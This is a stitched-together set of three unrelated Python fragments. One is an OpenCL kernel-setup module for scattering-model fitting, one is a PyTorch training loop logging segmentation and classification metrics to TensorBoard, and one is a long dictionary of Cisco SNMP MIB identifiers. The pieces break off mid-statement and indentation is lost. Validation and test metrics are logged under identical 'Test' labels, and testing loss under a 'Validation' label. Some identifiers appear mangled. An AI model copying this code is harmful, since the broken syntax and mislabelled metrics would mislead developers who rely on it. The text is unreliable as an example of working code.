This kernel is used during fitting, receiving new sets of parameters and
evaluating them. The output value is stored in an output buffer on the
devices, where it can be combined with other structure factors and form
factors and have instrumental resolution effects applied.
In order to use OpenCL for your models, you will need OpenCL drivers for
your machine. These should be available from your graphics card vendor.
Intel provides OpenCL drivers for CPUs as well as their integrated HD
graphics chipsets. AMD also provides drivers for Intel CPUs, but as of
this writing the performance is lacking compared to the Intel drivers.
NVidia combines drivers for CUDA and OpenCL in one package. The result
is a bit messy if you have multiple drivers installed. You can see which
drivers are available by starting python and running:
import pyopencl as cl
cl.create_some_context(interactive=True)
Once you have done that, it will show the available drivers which you
can select. It will then tell you that you can use these drivers
automatically by setting the SAS_OPENCL environment variable, which is
PYOPENCL_CTX equivalent but not conflicting with other pyopnecl programs.
Some graphics cards have multiple devices on the same card. You cannot
yet use both of them concurrently to evaluate models, but you can run
the program twice using a different device for each session.
OpenCL kernels are compiled when needed by the device driver. Some
drivers produce compiler output even when there is no error. You
can see the output by setting PYOPENCL_COMPILER_OUTPUT=1. It should be
harmless, albeit annoying.
"""
from __future__ import print_function
import sys
import os
import warnings
import logging
import time
try:
from time import perf_counter as clock
except ImportError: # CRUFT: python < 3.3
if sys.platform.count("darwin") > 0:
from time import time as clock
else:
from time import clock
import numpy as np # type: ignore
# Attempt to setup OpenCL. This may fail if the pyopencl package is not
# installed or if it is installed but there are no devices available.
try:
import pyopencl as cl # type: ignore
from pyopencl import mem_flags as mf
from pyopencl.characterize import get_fast_inaccurate_build_options
# Ask OpenCL for the default context so that we know that one exists.
cl.create_some_context(interactive=False)
HAVE_OPENCL = True
OPENCL_ERROR = ""
except Exception as exc:
HAVE_OPENCL = False
OPENCL_ERROR = str(exc)
from . import generate
from .generate import F32, F64
from .kernel import KernelModel, Kernel
# pylint: disable=unused-import
try:
from typing import Tuple, Callable, Any
from .modelinfo import ModelInfo
from .details import CallDetails
except ImportError:
pass
# pylint: enable=unused-import
# CRUFT: pyopencl < 2017.1 (as of June 2016 needs quotes around include path).
def quote_path(v):
# type: (str) -> str
"""
Quote the path if it is not already quoted.
If v starts with '-', then assume that it is a -I option or similar
and do not quote it. This is fragile: -Ipath with space needs to
be quoted.
"""
return '"'+v+'"' if v and ' ' in v and not v[0] in "\"'-" else v
def fix_pyopencl_include():
# type: (None) -> None
"""
Monkey patch pyopencl to allow spaces in include file path.
"""
# pylint: disable=protected-access
import pyopencl
if hasattr(pyopencl, '_DEFAULT_INCLUDE_OPTIONS'):
pyopencl._DEFAULT_INCLUDE_OPTIONS = [
quote_path(v) for v in pyopencl._DEFAULT_INCLUDE_OPTIONS
]
if HAVE_OPENCL:
fix_pyopencl_include()
# The max loops number is limited by the amount of local memory available
# on the device. You don't want to make this value too big because it will
# waste resources, nor too small because it may interfere with users trying
# to do their polydispersity calculations. A value of 1024 should be much
# larger than necessary given that cost grows as npts^k where k is the number
# of polydisperse parameters.
MAX_LOOPS = 2048
# Pragmas for enable OpenCL features. Be sure to protect them so that they
# still compile even if OpenCL is not present.
_F16_PRAGMA = """\
#if defined(__OPENCL_VERSION__) // && !defined(cl_khr_fp16)
# pragma OPENCL EXTENSION cl_khr_fp16: enable
#endif
"""
_F64_PRAGMA = """\
#if defined(__OPENCL_VERSION__) // && !defined(cl_khr_fp64)
# pragma OPENCL EXTENSION cl_khr_fp64: enable
#endif
"""
def use_opencl():
# type: () -> bool
"""Return True if OpenCL is the default computational engine"""
sas_opencl = os.environ.get("SAS_OPENCL", "OpenCL").lower()
return HAVE_OPENCL and sas_opencl != "none" and not sas_opencl.startswith("cuda")
ENV = None
def reset_environment():
# type: () -> "GpuEnvironment"
"""
Return a new OpenCL context, such as after a change to SAS_OPENCL.
"""
global ENV
ENV = GpuEnvironment() if use_opencl() else None
return ENV
def environment():
# type: () -> "GpuEnvironment"
"""
Returns a singleton :class:`GpuEnvironment`.
This provides an OpenCL context and one queue per device.
"""
if ENV is None:
if not HAVE_OPENCL:
raise RuntimeError("OpenCL startup failed with ***"
+ OPENCL_ERROR + "***; using C compiler instead")
reset_environment()
if ENV is None:
raise RuntimeError("SAS_OPENCL=None in environment")
return ENV
def has_type(device, dtype):
# type: (cl.Device, np.dtype) -> bool
"""
Return true if device supports the requested precision.
"""
if dtype == F32:
return True
elif dtype == F64:
return "cl_khr_fp64" in device.extensions
else:
# Not supporting F16 type since it isn't accurate enough.
return False
def get_warp(kernel, queue):
# type: (cl.Kernel, cl.CommandQueue) -> int
"""
Return the size of an execution batch for *kernel* running on *queue*.
"""
return kernel.get_work_group_info(
cl.kernel_work_group_info.PREFERRED_WORK_GROUP_SIZE_MULTIPLE,
queue.device)
def compile_model(context, source, dtype, fast=False):
# type: (cl.Context, str, np.dtype, bool) -> cl.Program
"""
Build a model to run on the gpu.
Returns the compiled program and its type.
Raises an error if the desired precision is not available.
"""
dtype = np.dtype(dtype)
if not all(has_type(d, dtype) for d in context.devices):
raise RuntimeError("%s not supported for devices"%dtype)
source_list = [generate.convert_type(source, dtype)]
if dtype == generate.F16:
source_list.insert(0, _F16_PRAGMA)
elif dtype == generate.F64:
source_list.insert(0, _F64_PRAGMA)
# Note: USE_SINCOS makes the Intel CPU slower under OpenCL.
if context.devices[0].type == cl.device_type.GPU:
source_list.insert(0, "#define USE_SINCOS\n")
options = (get_fast_inaccurate_build_options(context.devices[0])
if fast else [])
source = "\n".join(source_list)
program = cl.Program(context, source).build(options=options)
#print("done with "+program)
return program
# For now, this returns one device in the context.
# TODO: Create a context that contains all devices on all platforms.
class GpuEnvironment(object):
"""
GPU context for OpenCL, with possibly many devices and one queue per device.
"""
def __init__(self):
# type: () -> None
# Find gpu context.
context_list = _create_some_context()
# Find a context for F32 and for F64 (maybe the same one).
# F16 isn't good enough.
self.context = {}
for dtype in (F32, F64):
for context in context_list:
if has_type(context.devices[0], dtype):
self.context[dtype] = context
break
else:
self.context[dtype] = None
# Build a queue for each context.
self.queue = {}
context = self.context[F32]
self.queue[F32] = cl.CommandQueue(context, context.devices[0])
if self.context[F64] == self.context[F32]:
self.queue[F64] = self.queue[F32]
else:
context = self.context[F64]
self.queue[F64] = cl.CommandQueue(context, context.devices[0])
## Byte boundary for data alignment.
#self.data_boundary = max(context.devices[0].min_data_type_align_size
# for context in self.context.values())
# Cache for compiled programs, and for items in context.
self.compiled = {}
def has_type(self, dtype):
# type: (np.dtype) -> bool
"""
Return True if all devices support a given type.
"""
return self.context.get(dtype, None) is not None
def compile_program(self, name, source, dtype, fast, timestamp):
# type: (str, str, np.dtype, bool, float) -> cl.Program
"""
Compile the program for the device in the given context.
"""
# Note: PyOpenCL caches based on md5 hash of source, options and device
# but I'll do so as well just to save some data munging time.
tag = generate.tag_source(source)
key = "%s-%s-%s%s"%(name, dtype, tag, ("-fast" if fast else | |
)
avg_training_recall_of_epoch = np.average(self.stats.training_recall)
self.tb_writer.add_scalar(
"Avg Epoch Classification Metrics/Train Recall", avg_training_recall_of_epoch, self.epoch_sup_current + 1
)
avg_training_f1_of_epoch = np.average(self.stats.training_f1)
self.tb_writer.add_scalar("Avg Epoch Classification Metrics/Train F1", avg_training_f1_of_epoch, self.epoch_sup_current + 1)
avg_training_accuracy_of_epoch = np.average(self.stats.training_accuracy)
self.tb_writer.add_scalar(
"Avg Epoch Classification Metrics/Train Accuracy", avg_training_accuracy_of_epoch, self.epoch_sup_current + 1
)
avg_validation_precision_of_epoch = np.average(self.stats.validation_precision)
self.tb_writer.add_scalar(
"Avg Epoch Classification Metrics/Test Precision", avg_validation_precision_of_epoch, self.epoch_sup_current + 1
)
avg_validation_recall_of_epoch = np.average(self.stats.validation_recall)
self.tb_writer.add_scalar(
"Avg Epoch Classification Metrics/Test Recall", avg_validation_recall_of_epoch, self.epoch_sup_current + 1
)
avg_validation_f1_of_epoch = np.average(self.stats.validation_f1)
self.tb_writer.add_scalar(
"Avg Epoch Classification Metrics/Test F1 ", avg_validation_f1_of_epoch, self.epoch_sup_current + 1
)
avg_validation_accuracy_of_epoch = np.average(self.stats.validation_accuracy)
self.tb_writer.add_scalar(
"Avg Epoch Classification Metrics/Test Accuracy", avg_validation_accuracy_of_epoch, self.epoch_sup_current + 1
)
avg_testing_precision_of_epoch = np.average(self.stats.testing_precision)
self.tb_writer.add_scalar(
"Avg Epoch Classification Metrics/Test Precision", avg_testing_precision_of_epoch, self.epoch_sup_current + 1
)
avg_testing_recall_of_epoch = np.average(self.stats.testing_recall)
self.tb_writer.add_scalar(
"Avg Epoch Classification Metrics/Test Recall", avg_testing_recall_of_epoch, self.epoch_sup_current + 1
)
avg_testing_f1_of_epoch = np.average(self.stats.testing_f1)
self.tb_writer.add_scalar("Avg Epoch Classification Metrics/Test F1 ", avg_testing_f1_of_epoch, self.epoch_sup_current + 1)
avg_testing_accuracy_of_epoch = np.average(self.stats.testing_accuracy)
self.tb_writer.add_scalar(
"Avg Epoch Classification Metrics/Test Accuracy", avg_testing_accuracy_of_epoch, self.epoch_sup_current + 1
)
self.tb_writer.add_scalars(
"Avg Epoch Classification TRAIN Metrics/",
{
"Train Precision": avg_training_precision_of_epoch,
"Train Recall": avg_training_recall_of_epoch,
"Train F1": avg_training_f1_of_epoch,
"Train Accuracy": avg_training_accuracy_of_epoch,
},
self.epoch_sup_current + 1,
)
self.tb_writer.add_scalars(
"Avg Epoch Classification VALIDATION Metrics/",
{
"Test Precision": avg_validation_precision_of_epoch,
"Test Recall": avg_validation_recall_of_epoch,
"Test F1": avg_validation_f1_of_epoch,
"Test Accuracy": avg_validation_accuracy_of_epoch,
},
self.epoch_sup_current + 1,
)
self.tb_writer.add_scalars(
"Avg Epoch Classification TEST Metrics/",
{
"Test Precision": avg_testing_precision_of_epoch,
"Test Recall": avg_testing_recall_of_epoch,
"Test F1": avg_testing_f1_of_epoch,
"Test Accuracy": avg_testing_accuracy_of_epoch,
},
self.epoch_sup_current + 1,
)
if "unet_acs_with_cls" in self.config.model.lower():
avg_training_loss_of_epoch_seg = np.average(self.stats.training_losses_sup_seg)
avg_training_loss_of_epoch_cls = np.average(self.stats.training_losses_sup_cls)
if self.config.introduce_surrogate_at_epoch <= self.epoch_sup_current:
self.tb_writer.add_scalar(
"Avg Loss Epoch/Train Segmentation", avg_training_loss_of_epoch_seg, self.epoch_sup_current + 1
)
self.tb_writer.add_scalar("Avg Loss Epoch/Train CLS", avg_training_loss_of_epoch_cls, self.epoch_sup_current + 1)
else:
self.tb_writer.add_scalar(
"Avg Loss Epoch/Train Segmentation", avg_training_loss_of_epoch_seg, self.epoch_sup_current + 1
)
avg_validation_loss_of_epoch_seg = np.average(self.stats.validation_losses_sup_seg)
avg_validation_loss_of_epoch_cls = np.average(self.stats.validation_losses_sup_cls)
if self.config.introduce_surrogate_at_epoch <= self.epoch_sup_current:
self.tb_writer.add_scalar(
"Avg Loss Epoch/Validation Segmentation", avg_validation_loss_of_epoch_seg, self.epoch_sup_current + 1
)
self.tb_writer.add_scalar("Avg Loss Epoch/Validation CLS", avg_validation_loss_of_epoch_cls, self.epoch_sup_current + 1)
else:
self.tb_writer.add_scalar(
"Avg Loss Epoch/Validation Segmentation", avg_validation_loss_of_epoch_seg, self.epoch_sup_current + 1
)
avg_testing_loss_of_epoch_seg = np.average(self.stats.testing_losses_sup_seg)
avg_testing_loss_of_epoch_cls = np.average(self.stats.testing_losses_sup_cls)
if self.config.introduce_surrogate_at_epoch <= self.epoch_sup_current:
self.tb_writer.add_scalar(
"Avg Loss Epoch/Testing Segmentation", avg_testing_loss_of_epoch_seg, self.epoch_sup_current + 1
)
self.tb_writer.add_scalar("Avg Loss Epoch/Validation CLS", avg_testing_loss_of_epoch_cls, self.epoch_sup_current + 1)
else:
self.tb_writer.add_scalar(
"Avg Loss Epoch/Testing Segmentation", avg_testing_loss_of_epoch_seg, self.epoch_sup_current + 1
)
if self.config.introduce_surrogate_at_epoch <= self.epoch_sup_current:
self.tb_writer.add_scalars(
"Avg Loss Epoch/",
{
"Train Segmentation": avg_training_loss_of_epoch_seg,
"Train CLS": avg_training_loss_of_epoch_cls,
"Train Global": avg_training_loss_of_epoch,
"Validation Segmentation": avg_validation_loss_of_epoch_seg,
"Validation CLS": avg_validation_loss_of_epoch_cls,
"Validation Global": avg_validation_loss_of_epoch,
"Testing Segmentation": avg_testing_loss_of_epoch_seg,
"Testing CLS": avg_testing_loss_of_epoch_cls,
"Testing Global": avg_testing_loss_of_epoch,
},
self.epoch_sup_current + 1,
)
else:
self.tb_writer.add_scalars(
"Avg Loss Epoch/",
{
"Train Segmentation": avg_training_loss_of_epoch_seg,
"Train Global": avg_training_loss_of_epoch,
"Validation Segmentation": avg_validation_loss_of_epoch_seg,
"Validation Global": avg_validation_loss_of_epoch,
"Testing Segmentation": avg_testing_loss_of_epoch_seg,
"Testing Global": avg_testing_loss_of_epoch,
},
self.epoch_sup_current + 1,
)
if self.config.scheduler_sup.lower() == "reducelronplateau":
self.scheduler_sup.step(avg_validation_loss_of_epoch)
else:
self.scheduler_sup.step(self.epoch_sup_current)
print("------------- SUPERVISED --------------")
if "unet_acs_with_cls" in self.config.model.lower():
print(
"Epoch {}, test loss is {:.4f}, Validation loss is {:.3f}, training loss is {:.3f}. \n Validation Loss SEG is {}, Training loss SEG is {:.3f} \n Validation Loss Cls is {}, Training loss cls is {:.3f} \n Precision: TR {:.2f} / Test {:.2f} ; Recall: {:.2f} / {:.2f} ; F1:{:.2f} / {:.2f}, Accuracy:{:.2f} / {:.2f}".format(
self.epoch_sup_current + 1,
avg_testing_loss_of_epoch,
avg_validation_loss_of_epoch,
avg_training_loss_of_epoch,
avg_validation_loss_of_epoch_seg,
avg_training_loss_of_epoch_seg,
avg_validation_loss_of_epoch_cls,
avg_training_loss_of_epoch_cls,
avg_training_precision_of_epoch,
avg_validation_precision_of_epoch,
avg_training_recall_of_epoch,
avg_validation_recall_of_epoch,
avg_training_f1_of_epoch,
avg_validation_f1_of_epoch,
avg_training_accuracy_of_epoch,
avg_validation_accuracy_of_epoch,
)
)
else:
print(
"Epoch {},test loss is {:.4f}, validation loss is {:.4f}, training loss is {:.4f}".format(
self.epoch_sup_current + 1, avg_testing_loss_of_epoch, avg_validation_loss_of_epoch, avg_training_loss_of_epoch
)
)
try:
print("CURRNT SUP LR: {}".format(self.scheduler_sup.get_last_lr()))
except AttributeError:
print("CURRENT SUP LR: {}".format(self.optimizer_sup.param_groups[0]["lr"]))
if avg_validation_loss_of_epoch < self.best_loss_sup:
print("Validation loss decreased from {:.4f} to {:.4f}".format(self.best_loss_sup, avg_validation_loss_of_epoch))
self.best_loss_sup = avg_validation_loss_of_epoch
self.num_epoch_no_improvement_sup = 0
if self.config.save_model_every_n_epochs == 0:
self._save_model("sup")
elif (self.epoch_sup_current + 1) % self.config.save_model_every_n_epochs == 0:
self._save_model("sup", suffix="epoch_{}".format(self.epoch_sup_current + 1))
else:
print(
"Validation loss did not decrease from {:.4f}, num_epoch_no_improvement {}".format(
self.best_loss_sup, self.num_epoch_no_improvement_sup + 1
)
)
self.num_epoch_no_improvement_sup += 1
if self.config.save_model_every_n_epochs == 0:
self._save_model("sup", suffix="_no_decrease")
elif (self.epoch_sup_current + 1) % self.config.save_model_every_n_epochs == 0:
self._save_model("sup", suffix="epoch_{}".format(self.epoch_sup_current + 1))
if self.num_epoch_no_improvement_sup >= self.config.patience_sup_terminate:
print("Early Stopping SUP")
self.stats.stopped_early_sup = True
break
sys.stdout.flush()
self.tb_writer.add_scalar("Num_epochs w/ no improvement", self.num_epoch_no_improvement_sup, self.epoch_sup_current + 1)
self.sup_timedelta = time.time() - self.start_time
training_time_minutes = self.sup_timedelta // 60
training_time_hours = training_time_minutes / 60
print("TOTAL TRAINING TIME! MINUTES {}, HOURS{}".format(training_time_minutes, training_time_hours))
with open(os.path.join(self.stats.save_directory, "training_time.json"), "w") as f:
json.dump({"training_time_m": training_time_minutes, "training_time_h": training_time_hours}, f)
self._add_completed_flag_to_last_checkpoint_saved(phase="sup")
self.tb_writer.flush()
self.tb_writer.close()
print("FINISHED TRAINING SUP")
@staticmethod
def compute_precision_recall_f1(prediction, target):
# make target binary
predicted_labels = prediction.argmax(1)
# multi class f1-score will be done macro averaging as all classes are equally important #alternatily (emphasize z axis??)
pr, rec, f1, _ = precision_recall_fscore_support(
target, predicted_labels, average="macro"
) # sometimes predcited dont match target that's fine but some will of these metrics will be 0
accuracy = float((predicted_labels == target).sum()) / float(len(target))
return pr, rec, f1, accuracy
def add_hparams_to_writer(self):
hpa_dict = {
# "cube_dimensions": self.dataset.cube_dimensions
# if isinstance(self.dataset, Dataset) or isinstance(self.dataset, Dataset2D)
# else self.dataset[0].cube_dimensions,
"initial_lr_ss": self.config.lr_ss,
"loss_ss": self.config.loss_function_ss,
"optimizer_ss": self.config.optimizer_ss,
"scheduler_ss": self.config.scheduler_ss,
"batch_size_ss": self.config.batch_size_ss,
"nr_epochs_ss": self.config.nb_epoch_ss,
"initial_lr_sup": self.config.lr_sup,
"loss_sup": self.config.loss_function_sup,
"optimizer_sup": self.config.optimizer_sup,
"scheduler_sup": self.config.scheduler_sup,
"batch_size_sup": self.config.batch_size_sup,
"nr_epochs_sup": self.config.nb_epoch_sup,
}
self.ss_timedelta = 0 if (not hasattr(self, "ss_timedelta")) else (self.ss_timedelta // 60) # onversion to minutes
self.sup_timedelta = 0 if (not hasattr(self, "sup_timedelta")) else (self.sup_timedelta // 60)
self.stats.last_avg_training_loss_per_epoch_ss = (
0 if not self.stats.avg_training_loss_per_epoch_ss else self.stats.avg_training_loss_per_epoch_ss[-1]
)
self.stats.last_avg_validation_loss_per_epoch_ss = (
0 if not self.stats.avg_validation_loss_per_epoch_ss else self.stats.avg_validation_loss_per_epoch_ss[-1]
)
self.stats.last_avg_training_loss_per_epoch_sup = (
0 if not self.stats.avg_training_loss_per_epoch_sup else self.stats.avg_training_loss_per_epoch_sup[-1]
)
self.stats.last_avg_validation_loss_per_epoch_sup = (
0 if not self.stats.avg_validation_loss_per_epoch_sup else self.stats.avg_validation_loss_per_epoch_sup[-1]
)
met_dict = {
"final_train_loss_ss": self.stats.last_avg_training_loss_per_epoch_ss,
"final_val_loss_ss": self.stats.last_avg_validation_loss_per_epoch_ss,
"stopped_early_ss": self.stats.stopped_early_ss,
"training_time_ss": self.ss_timedelta,
"final_train_loss_sup": self.stats.last_avg_training_loss_per_epoch_sup,
"final_val_loss_sup": self.stats.last_avg_validation_loss_per_epoch_sup,
"stopped_early_sup": self.stats.stopped_early_sup,
"training_time_sup": self.sup_timedelta,
}
# if hasattr(self, "tester"):
# if isinstance(self.tester.dice, float):
# met_dict.update({"test_dice": self.tester.dice, "test_jaccard": self.tester.jaccard})
# elif isinstance(self.tester.dice, list):
# met_dict.update({"test_dice_{}".format(str(i)): dice for i, dice in enumerate(self.tester.dice)})
# met_dict.update({"test_jaccard_{}".format(str(i)): jacd for i, jacd in enumerate(self.tester.jaccard)})
self.tb_writer.add_hparams(hparam_dict=hpa_dict, metric_dict=met_dict)
self.tb_writer.flush()
self.tb_writer.close()
def load_model(self, **kwargs):
from ACSConv.acsconv.converters import ACSConverter
from ACSConv.experiments.lidc.resnet import FCNResNet
from_latest_checkpoint = kwargs.get("from_latest_checkpoint", False)
from_latest_improvement_ss = kwargs.get("from_latest_improvement_ss", False)
from_provided_weights = kwargs.get("from_provided_weights", False)
from_scratch = kwargs.get("from_scratch", False)
from_directory = kwargs.get("from_directory", False)
from_path = kwargs.get("from_path", False)
ensure_sup_is_completed = kwargs.get("ensure_sup_is_completed", False)
acs_kernel_split = kwargs.get("acs_kernel_split", None)
pool_features = kwargs.get("pool_features", False)
data_paralell = kwargs.get("data_paralell", True)
encoder_depth = kwargs.get("encoder_depth", [4])
branch_arch = kwargs.get("branch_arch", "single")
branch_depth = kwargs.get("branch_depth", 0)
bridge_mode = kwargs.get("bridge_mode", "multiple_classifiers")
# in_channels = kwargs.get("in_channels", 1)
# out_channels = kwargs.get("out_channels", 1)
# account_acs_out_conv = kwargs.get("account_acs_out_conv", False) # in config
# TODO fix_unsqueeze_order should be a param to the ACS converter to then add the attribute to conv layers such that the behaviour is set and not a parameter to the model or its components
fix_unsqueeze_order = kwargs.get("fix_unsqueeze_order", False)
if "unet_acs" not in self.config.model.lower():
assert acs_kernel_split is None
if self.config.model.lower() == "vnet_mg":
print("Loading VNET_MG")
self.model = UNet3D()
elif self.config.model.lower() == "unet_2d":
print("LOADING UNET 2D")
self.model = UNet(
n_channels=self.config.in_channels,
n_classes=self.config.out_channels,
bilinear=True,
apply_sigmoid_to_output=True,
fix_unsqueeze_order=fix_unsqueeze_order,
)
elif self.config.model.lower() == "unet_acs":
print("LOADING UNET_ACS")
self.model = UNet(
n_channels=self.config.in_channels,
n_classes=self.config.out_channels,
bilinear=True,
apply_sigmoid_to_output=True,
fix_unsqueeze_order=fix_unsqueeze_order,
)
self.model = ACSConverter(self.model, acs_kernel_split=acs_kernel_split)
elif self.config.model.lower() == "unet_acs_small":
print("LOADING UNET_ACS SMALL")
self.model = UNetSmall(
n_channels=self.config.in_channels,
n_classes=self.config.out_channels,
bilinear=True,
apply_sigmoid_to_output=True,
)
self.model = ACSConverter(self.model, acs_kernel_split=acs_kernel_split)
elif self.config.model.lower() == "unet_acs_small_gn":
print("LOADING UNET_ACS SMALL GN")
self.model = UNetSmallGN(
n_channels=self.config.in_channels,
n_classes=self.config.out_channels,
bilinear=True,
apply_sigmoid_to_output=True,
)
self.model = ACSConverter(self.model, acs_kernel_split=acs_kernel_split)
elif self.config.model.lower() == "unet_acs_gn":
print("LOADING UNET_ACS GROUP NORM")
self.model = UNetGN(
n_channels=self.config.in_channels,
n_classes=self.config.out_channels,
bilinear=True,
apply_sigmoid_to_output=True,
fix_unsqueeze_order=fix_unsqueeze_order,
)
self.model = ACSConverter(self.model, acs_kernel_split=acs_kernel_split)
elif self.config.model.lower() == "unet_acs_gn4":
print("LOADING UNET_ACS GROUP NORM 4")
self.model = UNetGN4(
n_channels=self.config.in_channels,
n_classes=self.config.out_channels,
bilinear=True,
apply_sigmoid_to_output=True,
fix_unsqueeze_order=fix_unsqueeze_order,
)
self.model = ACSConverter(self.model, acs_kernel_split=acs_kernel_split)
elif self.config.model.lower() == "unet_acs_no_affine":
print("LOADING UNET_ACS BN NO AFFINE")
self.model = UNet(
n_channels=self.config.in_channels,
n_classes=self.config.out_channels,
bilinear=True,
apply_sigmoid_to_output=True,
fix_unsqueeze_order=fix_unsqueeze_order,
affine=False,
)
self.model = ACSConverter(self.model, acs_kernel_split=acs_kernel_split)
elif self.config.model.lower() == "unet_acs_gn_no_affine":
print("LOADING UNET_ACS GROUP NORM NO AFFINE")
self.model = UNetGNAffine(
n_channels=self.config.in_channels,
n_classes=self.config.out_channels,
bilinear=True,
apply_sigmoid_to_output=True,
fix_unsqueeze_order=fix_unsqueeze_order,
)
self.model = ACSConverter(self.model, acs_kernel_split=acs_kernel_split)
elif self.config.model.lower() == "unet_acs_with_cls":
# dynamic setting of fc layers makes it not register on inital optimizer isntanciation
self.reload_params = True
print("LOADING UNET_ACS_CLS")
self.model = UnetACSWithClassifier(
n_channels=self.config.in_channels,
n_classes=self.config.out_channels,
bilinear=True,
apply_sigmoid_to_output=True,
encoder_depth=encoder_depth,
)
# self.model = ACSConverter(self.model, acs_kernel_split=acs_kernel_split)
elif self.config.model.lower() == "unet_acs_with_cls_multi":
# dynamic setting of fc layers makes it not register on inital optimizer isntanciation
self.reload_params = True
print("LOADING UNET_ACS_CLS_MULTI")
self.model = UnetACSWithClassifier(
n_channels=self.config.in_channels,
n_classes=self.config.out_channels,
bilinear=True,
apply_sigmoid_to_output=True,
branch_arch="multi",
| |
"ciscoMgmt.10.64.2.1.1.7": {},
"ciscoMgmt.10.64.2.1.1.8": {},
"ciscoMgmt.10.64.2.1.1.9": {},
"ciscoMgmt.10.64.3.1.1.1": {},
"ciscoMgmt.10.64.3.1.1.2": {},
"ciscoMgmt.10.64.3.1.1.3": {},
"ciscoMgmt.10.64.3.1.1.4": {},
"ciscoMgmt.10.64.3.1.1.5": {},
"ciscoMgmt.10.64.3.1.1.6": {},
"ciscoMgmt.10.64.3.1.1.7": {},
"ciscoMgmt.10.64.3.1.1.8": {},
"ciscoMgmt.10.64.3.1.1.9": {},
"ciscoMgmt.10.64.4.1.1.1": {},
"ciscoMgmt.10.64.4.1.1.10": {},
"ciscoMgmt.10.64.4.1.1.2": {},
"ciscoMgmt.10.64.4.1.1.3": {},
"ciscoMgmt.10.64.4.1.1.4": {},
"ciscoMgmt.10.64.4.1.1.5": {},
"ciscoMgmt.10.64.4.1.1.6": {},
"ciscoMgmt.10.64.4.1.1.7": {},
"ciscoMgmt.10.64.4.1.1.8": {},
"ciscoMgmt.10.64.4.1.1.9": {},
"ciscoMgmt.710.19172.16.17.32.1": {},
"ciscoMgmt.710.19172.16.17.32.10": {},
"ciscoMgmt.710.196.1.1.1.11": {},
"ciscoMgmt.710.196.1.1.1.12": {},
"ciscoMgmt.710.196.1.1.1.2": {},
"ciscoMgmt.710.196.1.1.1.3": {},
"ciscoMgmt.710.196.1.1.1.4": {},
"ciscoMgmt.710.196.1.1.1.5": {},
"ciscoMgmt.710.196.1.1.1.6": {},
"ciscoMgmt.710.196.1.1.1.7": {},
"ciscoMgmt.710.196.1.1.1.8": {},
"ciscoMgmt.710.196.1.1.1.9": {},
"ciscoMgmt.710.196.1.2": {},
"ciscoMgmt.710.196.1.3.1.1": {},
"ciscoMgmt.710.196.1.3.1.10": {},
"ciscoMgmt.710.196.1.3.1.11": {},
"ciscoMgmt.710.196.1.3.1.12": {},
"ciscoMgmt.710.196.1.3.1.2": {},
"ciscoMgmt.710.196.1.3.1.3": {},
"ciscoMgmt.710.196.1.3.1.4": {},
"ciscoMgmt.710.196.1.3.1.5": {},
"ciscoMgmt.710.196.1.3.1.6": {},
"ciscoMgmt.710.196.1.3.1.7": {},
"ciscoMgmt.710.196.1.3.1.8": {},
"ciscoMgmt.710.196.1.3.1.9": {},
"ciscoMgmt.710.84.1.1.1.1": {},
"ciscoMgmt.710.84.1.1.1.10": {},
"ciscoMgmt.710.84.1.1.1.11": {},
"ciscoMgmt.710.84.1.1.1.12": {},
"ciscoMgmt.710.84.1.1.1.2": {},
"ciscoMgmt.710.84.1.1.1.3": {},
"ciscoMgmt.710.84.1.1.1.4": {},
"ciscoMgmt.710.84.1.1.1.5": {},
"ciscoMgmt.710.84.1.1.1.6": {},
"ciscoMgmt.710.84.1.1.1.7": {},
"ciscoMgmt.710.84.1.1.1.8": {},
"ciscoMgmt.710.84.1.1.1.9": {},
"ciscoMgmt.710.84.1.2": {},
"ciscoMgmt.710.84.1.3.1.1": {},
"ciscoMgmt.710.84.1.3.1.10": {},
"ciscoMgmt.710.84.1.3.1.11": {},
"ciscoMgmt.710.84.1.3.1.12": {},
"ciscoMgmt.710.84.1.3.1.2": {},
"ciscoMgmt.710.84.1.3.1.3": {},
"ciscoMgmt.710.84.1.3.1.4": {},
"ciscoMgmt.710.84.1.3.1.5": {},
"ciscoMgmt.710.84.1.3.1.6": {},
"ciscoMgmt.710.84.1.3.1.7": {},
"ciscoMgmt.710.84.1.3.1.8": {},
"ciscoMgmt.710.84.1.3.1.9": {},
"ciscoMgmt.10.16.1.1.1": {},
"ciscoMgmt.10.16.1.1.2": {},
"ciscoMgmt.10.16.1.1.3": {},
"ciscoMgmt.10.16.1.1.4": {},
"ciscoMgmt.10.195.1.1.1": {},
"ciscoMgmt.10.195.1.1.10": {},
"ciscoMgmt.10.195.1.1.11": {},
"ciscoMgmt.10.195.1.1.12": {},
"ciscoMgmt.10.195.1.1.13": {},
"ciscoMgmt.10.195.1.1.14": {},
"ciscoMgmt.10.195.1.1.15": {},
"ciscoMgmt.10.195.1.1.16": {},
"ciscoMgmt.10.195.1.1.17": {},
"ciscoMgmt.10.195.1.1.18": {},
"ciscoMgmt.10.195.1.1.19": {},
"ciscoMgmt.10.195.1.1.2": {},
"ciscoMgmt.10.195.1.1.20": {},
"ciscoMgmt.10.195.1.1.21": {},
"ciscoMgmt.10.195.1.1.22": {},
"ciscoMgmt.10.195.1.1.23": {},
"ciscoMgmt.10.195.1.1.24": {},
"ciscoMgmt.10.195.1.1.3": {},
"ciscoMgmt.10.195.1.1.4": {},
"ciscoMgmt.10.195.1.1.5": {},
"ciscoMgmt.10.195.1.1.6": {},
"ciscoMgmt.10.195.1.1.7": {},
"ciscoMgmt.10.195.1.1.8": {},
"ciscoMgmt.10.195.1.1.9": {},
"ciscoMvpnConfig.1.1.1": {},
"ciscoMvpnConfig.1.1.2": {},
"ciscoMvpnConfig.1.1.3": {},
"ciscoMvpnConfig.1.1.4": {},
"ciscoMvpnConfig.2.1.1": {},
"ciscoMvpnConfig.2.1.2": {},
"ciscoMvpnConfig.2.1.3": {},
"ciscoMvpnConfig.2.1.4": {},
"ciscoMvpnConfig.2.1.5": {},
"ciscoMvpnConfig.2.1.6": {},
"ciscoMvpnGeneric.1.1.1": {},
"ciscoMvpnGeneric.1.1.2": {},
"ciscoMvpnGeneric.1.1.3": {},
"ciscoMvpnGeneric.1.1.4": {},
"ciscoMvpnProtocol.1.1.6": {},
"ciscoMvpnProtocol.1.1.7": {},
"ciscoMvpnProtocol.1.1.8": {},
"ciscoMvpnProtocol.2.1.3": {},
"ciscoMvpnProtocol.2.1.6": {},
"ciscoMvpnProtocol.2.1.7": {},
"ciscoMvpnProtocol.2.1.8": {},
"ciscoMvpnProtocol.2.1.9": {},
"ciscoMvpnProtocol.3.1.5": {},
"ciscoMvpnProtocol.3.1.6": {},
"ciscoMvpnProtocol.4.1.5": {},
"ciscoMvpnProtocol.4.1.6": {},
"ciscoMvpnProtocol.4.1.7": {},
"ciscoMvpnProtocol.5.1.1": {},
